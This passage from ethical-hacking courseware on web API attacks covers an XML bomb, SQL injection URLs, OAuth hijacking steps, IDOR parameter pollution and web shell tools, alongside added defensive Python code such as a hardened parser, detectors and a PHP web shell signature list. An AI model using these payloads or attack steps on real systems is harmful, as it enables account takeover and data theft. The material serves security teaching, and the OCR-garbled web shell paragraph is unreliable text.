When the abovementioned code is processed by a vulnerable or misconfigured XML parser, it will try to expand the lol9 entity, resulting in a memory-out-of-bound error. This either brings the target server totally down or makes it vulnerable to further attacks.
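The defence against the entity chain above, and against the recursive and oversize payloads described under Web Services Parsing Attacks, is to set the parser's policy before any expansion happens. The following added example (not from the courseware) uses Python's standard expat binding directly: it refuses any entity declaration, refuses external DTD subsets, caps document size and nesting depth, and turns every refusal into a single exception type the API layer can map to a generic error. The size and depth limits and the sample documents are constructed; the handler names are the real pyexpat attributes.

```python
"""A hardened XML front end against entity expansion, deep nesting and
oversize payloads.

Added example (not from the courseware). MAX_BYTES and MAX_DEPTH are
constructed policy values; the sample documents in the test are constructed.
"""
import xml.parsers.expat

MAX_BYTES = 1_000_000   # oversize-payload cap; tune to the service's real message sizes
MAX_DEPTH = 64          # nesting cap for deeply recursive documents


class RejectedXML(Exception):
    """Raised for any document the policy refuses to parse."""


def parse_hardened(data: bytes):
    """Parse `data` and return (root_tag, element_count), or raise RejectedXML."""
    if len(data) > MAX_BYTES:
        raise RejectedXML(f"document exceeds {MAX_BYTES} bytes")

    parser = xml.parsers.expat.ParserCreate()
    state = {"depth": 0, "count": 0, "root": None}

    def reject_entity(*_args):
        # Fires for every <!ENTITY ...> in the internal subset, i.e. before
        # lol1..lol9 could ever be expanded.
        raise RejectedXML("entity declarations are not accepted")

    def reject_external_doctype(_name, system_id, public_id, _has_internal_subset):
        if system_id or public_id:
            raise RejectedXML("external DTD subsets are not accepted")

    def start(tag, _attrs):
        state["depth"] += 1
        state["count"] += 1
        if state["root"] is None:
            state["root"] = tag
        if state["depth"] > MAX_DEPTH:
            raise RejectedXML(f"nesting deeper than {MAX_DEPTH}")

    def end(_tag):
        state["depth"] -= 1

    parser.EntityDeclHandler = reject_entity
    parser.StartDoctypeDeclHandler = reject_external_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise RejectedXML(f"malformed XML: {exc}") from None
    return state["root"], state["count"]


def is_accepted(data: bytes) -> bool:
    """Convenience wrapper: True if the policy lets the document through."""
    try:
        parse_hardened(data)
        return True
    except RejectedXML:
        return False


if __name__ == "__main__":
    # Constructed two-level cut of the entity chain shown above.
    bomb = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
            b'<!ENTITY lol1 "&lol;&lol;&lol;">]><lolz>&lol1;</lolz>')
    print(parse_hardened(b"<createUser><login>rinnimathews</login><pwd>password</pwd></createUser>"))
    print(is_accepted(bomb))                              # False
    print(is_accepted(b"<a>" * 70 + b"</a>" * 70))        # False
```

Raising inside a handler is how pyexpat lets a policy abort parsing early; the exception propagates out of `Parse`, so nothing after the offending declaration is processed. Services that must accept DTDs at all should instead bound the expansion ratio, which this stdlib interface does not expose.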
Another way in which attackers perform this attack is by uploading malicious script files, e.g., by uploading a shell script instead of the pdf document. This may result in executing the malicious script to bypass the security mechanisms on the server or propagating the script to other parties who are trying to access the API. Using this technique, the attackers try to extract information related to the underlying file system.
▪ Injection Attacks
Similar to traditional web applications, APIs are also vulnerable to various injection attacks. For example, consider the following normal URL:
http://billpay.com/api/v1/cust/459
For the abovementioned URL, the API retrieves the customer details based on the customer ID 459 from the database using the following SQL query:
"SELECT * FROM Customers where custID='" + custID + "'"
Here, the custID is replaced with 459:
"SELECT * FROM Customers where custID='459'"
In the abovementioned URL, assume that an attacker injects the malicious input
http://billpay.com/api/v1/cust/'%20or%20'1
The resultant malicious SQL query is
"SELECT * FROM Customers where custID='' or '1'"
The abovementioned query returns details of all the customers in the database. Using this information, an attacker may further delete or modify the data in the database or use the customers' information to perform other malicious activities on the database server.
These API injection attacks are performed not only using SQL but also using JSON, XPath, JavaScript, XSLT, etc., which require parsers/processors for execution.
Note: Similar to injection attacks, web APIs are also vulnerable to XSS and CSRF attacks.
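The /cust/{id} lookup above, run against an in-memory SQLite table so the effect of the `'%20or%20'1` input is visible, and then rewritten with a bound parameter. This is an added example, not from the courseware; the table columns and the two customer rows are constructed. The path-level check is an extra layer: a customer ID that is not all digits never reaches the query at all.

```python
"""The /cust/{id} lookup from the text: concatenated vs parameterized.

Added example (not from the courseware). The Customers table layout and
the two rows are constructed.
"""
import sqlite3
from urllib.parse import unquote


def make_db():
    """In-memory SQLite database with a constructed Customers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Customers (custID TEXT PRIMARY KEY, name TEXT, card_last4 TEXT)")
    conn.executemany("INSERT INTO Customers VALUES (?, ?, ?)", [
        ("459", "Rinni Mathews", "4242"),
        ("460", "Other Customer", "1881"),
    ])
    return conn


def get_customer_vulnerable(conn, cust_id):
    """String concatenation, exactly as the text's query is assembled.

    With cust_id = "' or '1" the statement becomes
    SELECT * FROM Customers where custID='' or '1'  and returns every row.
    """
    sql = "SELECT * FROM Customers where custID='" + cust_id + "'"
    return conn.execute(sql).fetchall()


def get_customer_safe(conn, cust_id):
    """Bound parameter: the driver passes cust_id as a value, never as SQL,
    so the same input simply matches no custID."""
    sql = "SELECT * FROM Customers where custID=?"
    return conn.execute(sql, (cust_id,)).fetchall()


def customer_id_from_path(path_segment):
    """Allowlist at the routing layer: decode, then accept decimal digits only."""
    value = unquote(path_segment)
    return value if value.isascii() and value.isdigit() else None


if __name__ == "__main__":
    db = make_db()
    print(get_customer_vulnerable(db, "459"))        # one row
    print(get_customer_vulnerable(db, "' or '1"))    # both rows: the injection
    print(get_customer_safe(db, "' or '1"))          # []
    print(customer_id_from_path("'%20or%20'1"))      # None, rejected before any query
```

The parameterized query is the fix; the path allowlist is defence in depth and also gives the server a clean point at which to log the attempt.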
Exploiting Insecure Configurations
○ Insecure SSL Configuration: Vulnerabilities in SSL configuration may allow attackers to perform MITM attacks. For example, using self-signed SSL certificates for secure API access may allow attackers to perform an MITM attack. An attacker may sniff the traffic between an API and a client, manipulate the client-side certificate, and start monitoring or manipulating the encrypted traffic between the client and the API.
Ethical Hacking and Countermeasures Copyright © by EC-Council
○ Insecure Direct Object References (IDOR): In general, direct object references are used as arguments for API calls, and access rights are not imposed on the objects for which a user does not have access. These vulnerabilities can be identified through API metadata and exploited by attackers to identify the parameters and try all possible values for the parameters to access the data to which the user does not have access.
○ Insecure Session/Authentication Handling: Vulnerabilities such as the reuse of session tokens, sequential session tokens, long session token timeout, unencrypted session tokens, and session tokens embedded into a URL allow attackers to hijack and take over the client session and steal or manipulate the messages between the client and the API.
Login/Credential Stuffing Attacks
Attackers often target login and validating systems because attacks on these systems are difficult to detect and stop using typical API security solutions. Attackers perform login attacks or credential stuffing attacks to exploit password reuse across multiple platforms. Most users use the same passwords to access different web services. Attackers can take advantage of credentials stolen from one account and use them to validate other services.
Credential stuffing attacks do not involve password guessing or brute-forcing the passwords; instead, attackers try to automate all the previously identified pairs of credentials using automated tools such as Sentry MBA, SNIPR, and PhantomJS to break into an account. These attacks can also be performed to disrupt API-based services by preventing valid users from signing in, thereby degrading the user experience and functionality of the front-facing APIs.
Attackers generally employ bots for different login attempts using the previously stolen data (collected from previous logins) or leaked information belonging to one account to breach other accounts/services or bombard the server with a large set of login requests until the right combination hits. Once the attack is successful, attackers not only take control of the user account but also perform illegitimate transactions from the account and conduct fraudulent online campaigns.
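The detection side of the pattern just described, as an added example that is not part of the courseware: a small detector run over constructed login-API log lines, which separates credential stuffing (one source trying many different accounts, one or two attempts each) from brute force (one source hammering one account) and lists the accounts the stuffing run actually hit. The log format and thresholds are assumptions.

```python
"""Added example (not from the CEH courseware): detecting credential stuffing
against a login API from access logs. Log format, IPs and thresholds are
constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: timestamp, client IP, request, user, status.
SAMPLE_LOG = """\
2020-05-01T10:00:01Z 203.0.113.7 POST /api/v1/login user=alice status=401
2020-05-01T10:00:02Z 203.0.113.7 POST /api/v1/login user=bob status=401
2020-05-01T10:00:02Z 203.0.113.7 POST /api/v1/login user=carol status=401
2020-05-01T10:00:03Z 203.0.113.7 POST /api/v1/login user=dave status=200
2020-05-01T10:00:04Z 203.0.113.7 POST /api/v1/login user=erin status=401
2020-05-01T10:00:04Z 203.0.113.7 POST /api/v1/login user=frank status=401
2020-05-01T10:00:09Z 198.51.100.4 POST /api/v1/login user=alice status=401
2020-05-01T10:00:10Z 198.51.100.4 POST /api/v1/login user=alice status=401
2020-05-01T10:00:11Z 198.51.100.4 POST /api/v1/login user=alice status=401
2020-05-01T10:00:12Z 198.51.100.4 POST /api/v1/login user=alice status=401
2020-05-01T10:00:13Z 198.51.100.4 POST /api/v1/login user=alice status=401
2020-05-01T10:00:14Z 198.51.100.4 POST /api/v1/login user=alice status=401
2020-05-01T10:05:00Z 192.0.2.55 POST /api/v1/login user=grace status=401
2020-05-01T10:05:30Z 192.0.2.55 POST /api/v1/login user=grace status=200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) POST /api/v1/login "
    r"user=(?P<user>\S+) status=(?P<status>\d{3})$"
)


def parse(log_text: str) -> list:
    """Turn log lines into (timestamp, ip, user, status) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login attempt; ignore
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["ip"], m["user"], int(m["status"])))
    return events


def detect(events: list, window: timedelta = timedelta(minutes=5),
           min_attempts: int = 5, min_distinct_users: int = 4) -> dict:
    """Slide a time window over each source IP's attempts. Many distinct
    accounts inside one window is the stuffing signature; many attempts
    against a single account is brute force. Returns {ip: label}."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            span = evs[start:end + 1]
            if len(span) < min_attempts:
                continue
            users = {e[2] for e in span}
            if len(users) >= min_distinct_users:
                findings[ip] = "credential_stuffing"
                break
            if len(users) == 1:
                findings[ip] = "brute_force"
                break
    return findings


def compromised_accounts(events: list, findings: dict) -> set:
    """Accounts that returned 200 to a flagged source: these are the 'right
    combination hits' and are the ones to lock and force a reset on."""
    return {user for _, ip, user, status in events
            if ip in findings and status == 200}


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    found = detect(evs)
    print(found)                                  # two flagged sources
    print(compromised_accounts(evs, found))       # {'dave'}
```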

Figure 14.90: Illustration of credential stuffing attack
API DDoS Attacks
The DDoS attack involves saturating an API with a massive volume of traffic from multiple infected computers (botnet) to delay the API services to legitimate users. Although many rate limit constraints are implemented to protect the server against crashing, they may not prevent the service delay (API response), thereby degrading the API's user experience.
Attackers often carry out these attacks using botnets that are created to discover and stay within the API rate limit control to increase the possibility of an attack. Along with the regular traffic from legitimate users, attackers' requests can also bypass API security management systems, load balancers, and other security implementations.
Most of these attacks may not be volumetric. They may also exploit certain API vulnerabilities to disrupt the API services. For instance, an attacker who gains access to the API can consume CPU and other memory resources reserved for the API to delay the service for as long as possible.

Figure 14.91: Illustration of API DDoS attack
Authorization Attacks on API: OAuth Attacks
According to https://auth0.com, OAuth is an authorization protocol that allows a user to grant limited access to his/her resources on one site to another site without having to expose his/her credentials. OAuth grants authorization flows for many computing devices and applications, such as connecting users to different applications from one application to access the required information.
Different actors involved in the OAuth process:
▪ Owner of the resource: The resource owner is also known as a user who grants permission to an application to access his/her account. The access to the application is limited or conditional, such as providing only read and write permissions.
▪ Authorization/Resource Server (API): The resource server provides the secured user account, and the authorization server validates the user identity and then supplies the access token to the application.
▪ Client or Application: It is an application that seeks access to the user account. To access the account, the user must authorize the application; then, the API should validate the authorization.
Steps involved in Authorization Code Grant
There are four steps involved in the authorization code grant, through which attackers can perform various authorization attacks on the API:
▪ The user passes the GET request to the client via the user agent to initiate the authorization process. This operation can be performed via the "Login with" or "Connect" button displayed on the client's site.
▪ The user agent can be redirected to the authorization server by the client using the following parameters:
○ response_type: Code used for informing the server which permissions to execute
○ client_id: ID assigned to the client
○ redirect_uri: URI where the authorization server redirects the user agent when the authorization code is provided
○ scope: Defines the level of access to the application
○ state: Opaque value used for security implementations. The value is also used for maintaining the state between request and callback
▪ When the user is authenticated and authorized to access the resource, the user agent is redirected to redirect_uri by the authorization server. The server uses the following parameters to do this:
○ code: Authorization code
○ state: Value supplied in the above-mentioned request
▪ Using the authorization code, the client requests the access token by adding the following parameters in the body of a request:
○ grant_type: authorization_code
○ code: Authorization code received in the previous message
○ redirect_uri: URI used in the first request
OAuth Attacks
Various attacks on OAuth performed by manipulating the requests stated above are described below:
Attack on 'Connect' Request
Most sites enable users to access other websites such as LinkedIn, Instagram, and Twitter via OAuth. An attacker can exploit requests to connect one site to another, i.e., when the user hits the "Login with" or "Connect" button. Then, he or she can gain illegal access to the user/victim's client-side account by connecting his/her account to the provider's website.
Steps to perform an attack on "Connect" request:
▪ The attacker opens a fake account on the provider's website
▪ The attacker initiates the "Connect" operation with the client through his/her fake account on the provider's website but halts authorization server redirects, which means that the attacker validates the client to access his/her resources on the provider, while the client is not informed.
▪ The attacker creates a malicious web page as follows:
✓ Uses CSRF to make the user logout on the provider.
✓ Again uses CSRF to make the user login on the provider using his/her fake account credentials.
✓ Spoofs the first request to connect the provider account with the client. It is just another GET request. It is usually performed inside the <iframe> tag to make the user unaware of this action.
▪ Once the victim opens the attacker's malicious page, his/her account gets logged out on the provider and connects as a fake account. Then, the attacker's fake account is connected with the victim's account on the client. The victim does not ask the client for permission, as the attacker has already approved it. Hence, the attacker can login to the victim's account on the client side using his/her fake account on the provider.
Attack on 'redirect_uri'
While registering, the domain is usually specified by the client and only those "redirect_uri" on the specific domain are permitted. If an attacker can identify vulnerabilities such as XSS on a web page on the client domain, he/she can exploit them to capture the authorization code.
Steps to perform an attack on 'redirect_uri':
▪ The attacker leaks data through a vulnerable page on the client domain: https://xyz.com/vuln
▪ The attacker installs malicious JavaScript on the page; then, the page sends the URL, which is loaded in the browser (along with the parameter fragments), to the attacker
▪ The attacker creates a page that prompts the user to open a malicious link:
https://provider.com/oauth/authorize?client_id=CLIENTID&response_type=auth_code&redirect_uri=https%3A%2F%2Fxyz.com%2Fvuln
▪ When the victim opens the malicious link, the user agent is redirected to https://xyz.com/vuln?code=CODE, and the CODE is then exfiltrated to the attacker
▪ Now, the attacker uses the retrieved code to provide the access token via the authentic 'redirect_uri', such as https://xyz.com/oauth/callback?code=CODE
CSRF on Authorization Response
The attacker performs a CSRF attack to connect a fake account on the provider with the victim's account on the client side. This attack exploits the third request related to the authorization code grant.
Steps to perform CSRF on authorization response:
▪ The attacker opens a fake account on the provider
▪ The attacker starts a "Connect" operation with the client through his/her fake account on the provider, but halts authorization server redirects, which means that the attacker has validated the client to access his/her resources on the provider, while the client is not informed. Hence, the attacker stores the authorization_code.
▪ The attacker persuades the user to send a request to https://xyz.com/<provider>/login?code=Auth_Code. This operation can be implemented by luring the victim into opening a malicious link embedded with an img or script tag along with the above-mentioned link as source.
▪ When the victim logs into the client, the attacker's fake account is connected to the victim's account
▪ Now, the attacker can sign in as the victim on the client by logging in with his/her fake account on the provider
Access Token Reusage
OAuth requires unique access tokens for individual clients. It ensures that these tokens saved on the authorization server are mapped to relevant scopes and time expiry. Access tokens provided for "Client A" can work for "Client B". Attackers exploit this feature to perform attacks on clients that allow grants implicitly.
Steps to reuse access tokens:
▪ The attacker develops a legitimate client application "client A" and enrolls it with some provider
▪ Now, the attacker lures the victim into accessing "client A" and gains illegal access to the victim's access token on "client A"
▪ Let us consider that the victim accesses "client B", which uses the implicit grant. In such a case, the authorization server redirects the user agent to https://clientB.com/callback#access_token=ACCESSTOKEN. Now, the attacker can open this URL with client A's access_token.
▪ The attacker is verified as a valid entity by "client B". Therefore, one access token is sufficient for use on many clients using the implicit grant.
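The authorization code grant steps listed earlier, modelled end to end as an added example that is not part of the courseware, with the three checks that close the redirect_uri, CSRF-on-authorization-response and token-reuse attacks just described: an exact match on the registered redirect_uri, a per-session state value verified on callback, and a token bound to the client it was issued to. The provider, client names and URLs are constructed; a real deployment uses an OAuth library, this only shows where each check sits.

```python
"""Added example (not from the CEH courseware): a toy authorization server,
resource server and client for the authorization code grant. Client ids,
hostnames and users are constructed for this example."""
import secrets
from urllib.parse import urlencode, urlparse, parse_qs

# --- Authorization server side (constructed provider.com) ------------------
REGISTERED_CLIENTS = {            # client_id -> exact redirect_uri at enrolment
    "clientA": "https://clienta.example/callback",
    "clientB": "https://clientb.example/callback",
}
_codes = {}    # authorization code -> (client_id, redirect_uri, user)
_tokens = {}   # access token -> (client_id, user)


def authorize(client_id, redirect_uri, state, user):
    """Step 2: issue a code only for the exact registered redirect_uri, so the
    code is never delivered to an attacker-chosen page on the client domain."""
    if REGISTERED_CLIENTS.get(client_id) != redirect_uri:
        raise ValueError("redirect_uri is not the registered value")
    code = secrets.token_urlsafe(16)
    _codes[code] = (client_id, redirect_uri, user)
    # Step 3: redirect back, echoing the client's state unchanged.
    return redirect_uri + "?" + urlencode({"code": code, "state": state})


def token(grant_type, code, redirect_uri, client_id):
    """Step 4: exchange the code once; client and redirect_uri must match."""
    if grant_type != "authorization_code":
        raise ValueError("unsupported grant_type")
    issued = _codes.pop(code, None)           # single use: replay fails
    if issued is None or issued[:2] != (client_id, redirect_uri):
        raise ValueError("code unknown or issued to another client/uri")
    tok = secrets.token_urlsafe(24)
    _tokens[tok] = (client_id, issued[2])
    return tok


def resource(access_token, client_id):
    """Resource server: a token is bound to the client it was issued to, so a
    token obtained through client A is refused when presented for client B."""
    issued_to, user = _tokens[access_token]
    if issued_to != client_id:
        raise PermissionError("token audience mismatch")
    return user


# --- Client side (constructed clienta.example) ------------------------------
class Client:
    def __init__(self, client_id):
        self.client_id = client_id
        self.redirect_uri = REGISTERED_CLIENTS[client_id]
        self.sessions = {}  # browser session -> state awaiting callback

    def start_login(self, session):
        """Step 1: the 'Connect' click; a fresh state is tied to this session."""
        state = secrets.token_urlsafe(16)
        self.sessions[session] = state
        return "https://provider.com/oauth/authorize?" + urlencode({
            "response_type": "code", "client_id": self.client_id,
            "redirect_uri": self.redirect_uri, "scope": "profile",
            "state": state})

    def callback(self, session, url):
        """A code planted in this session by someone else (CSRF on the
        authorization response) carries a state this session never issued."""
        q = parse_qs(urlparse(url).query)
        expected = self.sessions.pop(session, None)
        if expected is None or expected != q.get("state", [None])[0]:
            raise ValueError("state mismatch: possible CSRF")
        return token("authorization_code", q["code"][0],
                     self.redirect_uri, self.client_id)


if __name__ == "__main__":
    c = Client("clientA")
    c.start_login("victim-browser")
    cb = authorize("clientA", c.redirect_uri, c.sessions["victim-browser"], "victim")
    print(resource(c.callback("victim-browser", cb), "clientA"))   # victim
```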

Other Techniques to Hack an API
Different ways to hack an API are discussed below:
▪ Reverse Engineering
Viewing the APIs from the developer's viewpoint can be flawed because it checks only if an API is working as intended. Once it is deployed for the end-user experience, it may not work as it worked in the developer environment. This is what attackers often attempt to do while reverse-engineering the API. Attackers invoke APIs in reverse order to identify the flaws residing in the API that can be obfuscated in real-time usage.
For instance, consider an order flow in which an order is made using the same account that is already used for an earlier booking. The order appears to be something like this:
○ Order made
○ Order linked with the account
○ Order is accepted
Attackers can use this flow in the process of reverse engineering an API. If the accepting mechanism is carried in the reverse order, the internal API used to connect orders to accounts can be crashed, thereby forcing the browser to expose the account details of a user.
▪ User Spoofing
It is a process of concealing the original identity and masquerading as some other valid entity. In most cases, the attacker tries to pose as a legitimate user with special privileges and provides free data access to additional users to cause more damage. Attackers use details obtained from phishing or any other information leaking methods to masquerade as the original user.
If attackers can successfully break into the system, they can perform some type of privilege escalation attack by redirecting the URI function to another URI, injecting code that serves as text, or bombarding the API with excessive data, causing buffer overflow.
▪ Man-in-the-Middle Attacks
In an MITM attack, attackers watch the API communications with the server or behave themselves as a server by intercepting the request calls. The attacker's motive, in this case, is to provide fake links that appear to be legitimate in API interaction. These attacks can be carried out by domain squatting and copying API resource location.
For instance, the user might make a resource call via the API.io/media/function, and the attacker might be sitting at the APO.io/media/function. A change in a single character can make a significant difference. If the user clicks on the second link without noticing the URL misinterpretation, he/she will be providing sensitive information to an attacker-controlled server.
▪ Session Replay Attacks
Session replay attacks can be launched on websites and other sources that initiate and store sessions. These attacks are usually performed to obtain session IDs and replay them to the server. In this case, attackers rewind the session time and prompt the server to disclose information as though a similar request is made once again.
▪ Social Engineering
Although it may not be a direct API attack, social engineering can be performed through the API. Social engineering does not affect the API or the machine code; it is a technique employed to trick users into divulging their credentials or other sensitive information. Phishing is a technique often used to send malicious links to users via email to reset or validate their security credentials. Spear-phishing is another sophisticated social engineering attack in which additional data is provided to the users, making them believe that they are interacting with a valid endpoint. If the user enters his/her credentials on the fake link, attackers can capture the data and launch further attacks such as modifying the account details and illegitimate online transactions using the stolen credentials.
REST API Vulnerability Scanning
REST API vulnerabilities introduce the same risks as security issues in web applications and websites. These risks include critical data theft, intermediate data tampering, etc. Performing thorough API vulnerability scanning on REST APIs can expose various underlying vulnerabilities that attackers can exploit. Attackers can use tools such as Astra, Fuzzapi, w3af, and AppSpider to carry out REST API vulnerability scanning.
▪ Astra
Source: https://github.com
Attackers use the Astra tool to detect and exploit underlying vulnerabilities in a REST API. Astra can discover and test authentications such as login and logout; this feature makes it easy for attackers to incorporate it into the CI/CD pipeline. Astra can invoke an API collection as an input value; hence, it can also be used for scanning REST APIs.
Astra allows attackers to detect REST APIs that are vulnerable to attacks such as XSS, SQL injection, information leakage, CSRF, broken authentication and session management, JWT attack, blind XXE injection, CRLF detection, CORS misconfiguration, and rate limiting.

Figure 14.92: Screenshot of Astra
Some REST API vulnerability scanning tools are as follows:
▪ Fuzzapi (https://github.com)
▪ w3af (http://docs.w3af.org)
▪ AppSpider (https://www.rapid7.com)
▪ Vooki (https://www.vegabird.com)
▪ OWASP ZAP (https://www.owasp.org)

Bypassing IDOR via Parameter Pollution
Insecure Direct Object Reference (IDOR) is a vulnerability that arises when developers disclose references to internal data enforcement objects such as database keys, directories, and other files, which can be exploited by an attacker to modify the references and gain unauthorized access to the data. These IDORs can be bypassed by providing a single parameter name repeatedly with unique values.
For instance, assume that the victim's user_id is 321. Attackers can change this user_id value to 654 (it is another user_id value) to identify IDOR. If the page is not vulnerable to IDOR, it generates a "401 Unauthorized" error message.
To bypass IDOR via parameter pollution, the attacker sends two user_id parameters in a request, in which one parameter is appended with the victim's user_id and the other one is appended with the attacker's own user_id. For example, consider the following request:
api.xyz.com/profile/user_id=321
The attacker manipulates the above-mentioned request using parameter pollution to bypass IDOR:
api.xyz.com/profile/user_id=654&user_id=321
When the above-mentioned request is processed at the REST API endpoint, the application verifies the first user_id parameter and ensures that the user who is sending the request has included his/her own user_id in the GET request. Hence, an attacker can bypass IDOR by providing two user_id parameters: one belongs to the victim and the other belongs to the attacker. The application is tricked into considering it as a valid request.
Attackers use tools such as Burp Suite to proxy the traffic and intercept all the traffic to REST API endpoints. Then, they use the parameter pollution technique to send both the attacker's user_id and the victim's user_id in the GET request to gain unauthorized access and retrieve sensitive data from the victim's account. Using this technique, attackers can also compromise the application's functionality because every parameter inside the application is vulnerable to this attack.
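Why the doubled user_id above gets through, and how to close it, as an added example that is not part of the courseware: an endpoint that authorizes only the first user_id value while the data layer uses the last one, beside a hardened version that refuses duplicated parameters and authorizes the single value it actually uses. The profile store is constructed, and the request is written in query-string form (?user_id=...) rather than the path form the text shows.

```python
"""Added example (not from the CEH courseware): IDOR bypass through
parameter pollution, vulnerable and hardened. The profile records are
constructed sample data; the endpoint is a stand-in for api.xyz.com."""
from urllib.parse import urlparse, parse_qs

# Constructed profile store: user_id -> record the endpoint returns.
PROFILES = {
    "321": {"name": "victim", "email": "victim@example.test"},
    "654": {"name": "attacker", "email": "attacker@example.test"},
}


def duplicated_params(url: str) -> list:
    """Names that appear more than once in the query string; a gateway or WAF
    can log or block requests where this is non-empty for sensitive APIs."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    return sorted(name for name, values in qs.items() if len(values) > 1)


def profile_vulnerable(url: str, session_user_id: str) -> tuple:
    """The check reads the first user_id (as the text describes), but the
    lookup below it uses the last duplicate, so the two disagree."""
    ids = parse_qs(urlparse(url).query, keep_blank_values=True).get("user_id", [])
    if not ids or ids[0] != session_user_id:
        return 401, None                      # "401 Unauthorized"
    record_id = ids[-1]                       # a different layer picks the last
    return 200, PROFILES.get(record_id)


def profile_hardened(url: str, session_user_id: str) -> tuple:
    """Exactly one user_id is accepted, and the value that is authorized is the
    same value that is used for the lookup."""
    ids = parse_qs(urlparse(url).query, keep_blank_values=True).get("user_id", [])
    if len(ids) != 1:
        return 400, None                      # duplicated or missing: refuse
    if ids[0] != session_user_id:
        return 401, None
    return 200, PROFILES.get(ids[0])


if __name__ == "__main__":
    polluted = "https://api.xyz.com/profile?user_id=654&user_id=321"
    print(duplicated_params(polluted))                    # ['user_id']
    print(profile_vulnerable(polluted, "654"))            # victim's record
    print(profile_hardened(polluted, "654"))              # (400, None)
```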

Figure 14.93: Screenshot of Burp Suite

Web Shells
‘Awebshelli s amalicious pieceofcodeor scriptthat is developed usingserver-side languages
suchas PHP, ASP, PERL, RUBY, and Python,
andtheninstalledon a targetserver. Themalicious
scriptenables attackers to gain remote accessor remoteadministration capabilities over the
targetserver along with its file system,
Attackersinjectmaliciousscripts byexploiting
most common vulnerabilitiessuchas remote file
inclusion(RFI), localfile inclusion(LF),expositionof administrationinterfaces, and SQL
Attackerscan also perform
injection, XSSattacksusing socialengineering techniques to install
themalicious
code.
Attackersalsoemploy networkmonitoring tools (mainly Wireshark)to discovervulnerabilities
that can be exploited later for web shell injection.Thesevulnerabilitiesoften lie i n a web
server'ssoftware or content management system (CMS).
Webshellsare usedbythe attackerto carryout privilege escalationandgainremote accessto
download, upload,erase, and execute files on the targetweb server. Using the web shell,
attackersc an alsostealprivatedata,damage thewebsite’s via DDoS
reputation attacks,
change
the structure of the website, makethe web page's resources unavailableon the Internet,
exfiltratedata,ete
maintain persistence,

Figure 14.94: Illustration of a web shell

Web Shell Tools
Attackers use various web shell tools such as WSO PHP Webshell, b374k, C99, China Chopper, R57, and WSO (web shell by oRb) to gain remote control over target web servers.
▪ WSO Php Webshell
Source: https://github.com
WSO Php Webshell is a web shell that allows attackers to monitor running processes and execute remote commands to download, upload, erase, or edit files. It also allows attackers to access and infect remote servers and access SQL databases.

Figure 14.95: Screenshot of WSO Php Webshell
Some additional web shell tools are as follows:
▪ b374k (https://github.com)
▪ C99 (https://github.com)
▪ China Chopper (https://www.fireeye.com)
▪ R57 (https://github.com)
▪ Pouya ASP WebShell (https://github.com)

Gaining Backdoor Access via Web Shell
Gaining backdoor access refers to entering a website in a stealthy way. These backdoors are often installed via some unvalidated uploads. Such a vulnerability allows attackers to upload harmful files to the target web server. Websites developed using PHP are often susceptible to such attacks. Attackers use tools such as Weevely to gain backdoor access to a website without being traced.
▪ Weevely
Source: https://github.com
Attackers use Weevely to develop a backdoor shell and upload it to a target server to gain remote shell access. This tool also helps attackers in performing administrative tasks, maintaining persistence, and spreading backdoors across the target network.

Figure 14.96: Screenshot of Weevely

How to Prevent Installation of a Web Shell
Various best practices for preventing the installation of a web shell are discussed below:
▪ Update the application and host server's operating system and apply patches regularly to protect it from known bugs
▪ Establish a demilitarized zone (DMZ) between the web server and the internal network
▪ Ensure secure configuration of the web server using strong authentication techniques and avoid using default passwords
▪ Block all the unused ports and unnecessary services running in the web servers
▪ Perform user input data validation to control and prevent local file inclusion and remote file inclusion (LFI and RFI) vulnerabilities
▪ Establish a reverse proxy service for retrieving resources and restricting the admin URLs to known legitimate ones
▪ Perform regular vulnerability scans to detect the areas of threats using any web security software
▪ Deploy firewalls on the web server to monitor and control the network traffic based on the security rules
▪ Deactivate directory browsing in the web server to prevent directory traversal attacks
▪ Regularly audit the accounts and review the group permissions to prevent the installation of a web shell from the web server to the internal network
▪ Disable all unused and risky PHP functions such as exec(), shell_exec(), show_source(), proc_open(), passthru(), and pcntl_exec()
▪ Use escapeshellarg() and escapeshellcmd() to ensure that the user inputs are not injected into the shell commands to avoid command execution vulnerabilities
▪ Ensure that all the web applications using upload forms are secure and permit only the whitelisted file types
▪ Avoid using code from untrusted websites or online forums
▪ Do not install unnecessary third-party plugins and regularly check and update the plugins used

Web Shell Detection Tools
Attackers often try to discover vulnerabilities in an application or web page, through which they target the web servers. Then, they exploit those vulnerabilities to install backdoors via web shells to gain remote access and perform malicious operations on the target server. To prevent such attacks, it is mandatory to carry out regular web shell or backdoor scanning. Security professionals use tools such as Web Shell Detector, FireEye Network Security, and NeoPI to detect these web shells on the target servers.
▪ Web Shell Detector
Source: https://www.shelldetector.com
Web Shell Detector is a PHP/Python-based script that helps in scanning and discovering php/cgi(perl)/asp/aspx shells. It has a "web shells signature database" that helps in discovering the web shell.
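A signature-style scan of the kind such detectors perform, as an added example that is not part of the courseware or of Web Shell Detector itself, written for PHP sources only: it flags request input flowing into the risky functions listed under "How to Prevent Installation of a Web Shell" (plus eval/assert), variable function calls fed from request input, and eval of a decoded payload, and scores each file. The signatures, weights and sample files are constructed.

```python
"""Added example (not from the CEH courseware): a minimal PHP web shell
scanner. Signatures, weights and the sample files are constructed for this
example; a production tool carries a much larger signature database."""
import re

RISKY_FUNCS = ["exec", "shell_exec", "system", "passthru", "proc_open", "popen",
               "pcntl_exec", "show_source", "eval", "assert"]
OBFUSCATION = ["base64_decode", "gzinflate", "gzuncompress", "str_rot13"]
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)"

# risky_function( ...anything up to the statement end... )
RISKY_CALL = re.compile(r"\b(" + "|".join(RISKY_FUNCS) + r")\s*\(([^;]*)")
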